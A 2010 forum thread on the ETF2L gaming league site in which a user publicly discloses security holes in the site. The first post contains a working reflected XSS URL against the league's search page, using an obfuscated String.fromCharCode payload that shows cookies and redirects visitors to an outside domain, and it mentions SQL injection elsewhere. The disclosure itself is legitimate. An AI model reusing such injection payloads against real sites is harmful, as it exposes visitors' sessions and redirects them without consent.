x
ETF2L is looking for new Staff to recruit! Are you interested in supporting the league? Then click here for more details on what we can offer and how to apply! 

Forum

Forums » Support » htmlentities is your friend, addslash...

htmlentities is your friend, addslashes and stripslashes are not

Created 1st November 2010 @ 18:57

Add A Reply Pages: 1

d1ck j0nes

Decent chaps

http://etf2l.org/search/%22%3Cscript%3Ealert(document.cookie);eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,121,111,117,102,97,105,108,46,111,114,103,34));%3C/script%3E/Also the search function is broken.[/url]

Umptieth time I come across something like this on etf2l (XSS on team pages, country flags, recruitment posts, SQL-injection vulnerabilities on the RSS feed, forum tracker, video browser, etc).

Stuff goes in -> Sanitize for SQL-injections (time to look into prepared statements?)
Stuff comes out -> Check for HTML and JS

This isn’t rocket science.


Last edited by d1ck j0nes,

#quote

Admirable

(Toucan Ambassador)

:>

#quote

Skyride

DUCS

This man is indeed an utter cock, but he’s right.


Last edited by Skyride,

#quote

Arie

(serveme.tf)
FB
[FB]

Community members willing and able to wade through 3 years of PHP WTFs, please rise.

I’ll pass. GL ETF2L, get on it.


Last edited by Arie,

#quote

Add A Reply Pages: 1

Subscribe to this topic (RSS)